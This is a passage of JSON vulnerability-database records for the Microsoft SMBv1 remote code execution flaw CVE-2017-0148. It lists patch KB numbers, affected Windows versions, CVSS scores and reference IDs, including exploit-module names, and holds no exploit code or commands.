"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB3177186", "KB3205409", "KB4012598", "KBMS16-110, 3187754", "KB3213986", 
"KB4012217", "KB4013198", "KB4013429", "KB3210720", "KB4012606", "KB4012213", "KB3210721", "KB4012216", "KB4012214", "KB4012212", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T08:45:32", "differentElements": ["msAffectedSoftware"], "edition": 25}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-10T10:45:12", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4013198", "KB4012213", "KB3205409", "KB4012598", "KB4012216", "KB4012217", "KB4012212", "KB3177186", "KB3210720", "KB3213986", "KB3205401", "KB4012606", "KB3210721", "KB4013429", "KB4012215", "KBMS16-110, 3187754", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T10:45:12", "differentElements": ["msAffectedSoftware"], "edition": 26}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-10T18:58:50", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3205409", "KB4012216", "KB3213986", "KB3212646", "KB4012213", "KB3210720", "KB4013429", 
"KB4012606", "KB4012214", "KBMS16-110, 3187754", "KB4012217", "KB4012215", "KB4013198", "KB3177186", "KB3210721", "KB4012598", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
